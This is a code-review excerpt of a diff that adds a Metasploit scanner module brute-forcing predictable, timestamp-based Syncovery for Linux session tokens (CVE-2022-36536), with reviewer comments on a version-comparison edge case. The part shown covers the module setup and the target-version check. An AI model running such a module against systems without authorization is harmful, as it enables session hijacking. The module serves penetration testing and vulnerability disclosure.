modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb

```diff
@@ -0,0 +1,149 @@
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Syncovery For Linux Web-GUI Session Token Brute-Forcer',
+        'Description' => %q{
+          This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time
+          of the login instead of a random token.
+          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.
+        },
+        'Author' => [ 'Jan Rude' ],
+        'References' => [
+          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
+          ['CVE', '2022-36536']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8999,
+          'STOP_ON_SUCCESS' => true # One valid session is enough
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
+        OptInt.new('DAYS', [true, 'Check today and last X day(s) for valid session token', 1]),
+        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
+      ]
+    )
+
+    deregister_options(
+      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
+      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
+      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'PASSWORD_SPRAY', 'BLANK_PASSWORDS',
+      'USER_FILE', 'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
+      'method' => 'GET'
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to host - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res.code})") if res.code != 200
+
+    if res.code == 200
+      if res.body.scan(/"isSyncoveryLinux":"true"/).flatten[0] || res.body.scan(/"isSyncoveryWindows":"false"/).flatten[0]
+        version = res.body.scan(/"SyncoveryTitle":"Syncovery\s([A-Za-z0-9.]+)/).flatten[0] || ''
+        if version.empty?
+          vprint_warning("#{rhost}:#{rport} - Could not identify version")
+          Exploit::CheckCode::Detected
+        elsif Rex::Version.new(version) < Rex::Version.new('9.48j')
```

Comment:
I'm not sure what all of the formats are for the target software, would something like this be an issue?
```
>> Rex::Version.new('9.48') < Rex::Version.new('9.48j')
=> false
```

Reply:
Actually yes. I checked the [version history](https://www.syncovery.com/detailed-version-history/). and it seems like the first version is always without a letter.

Reply:
I would resolve this issue with:
`Rex::Version.new(version) < Rex::Version.new('9.48j') || version == '9.48'`